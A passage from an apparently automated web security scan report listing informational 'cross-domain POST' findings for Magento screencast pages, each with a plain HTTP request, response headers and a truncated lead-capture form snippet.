X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.83. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.90. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.93. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

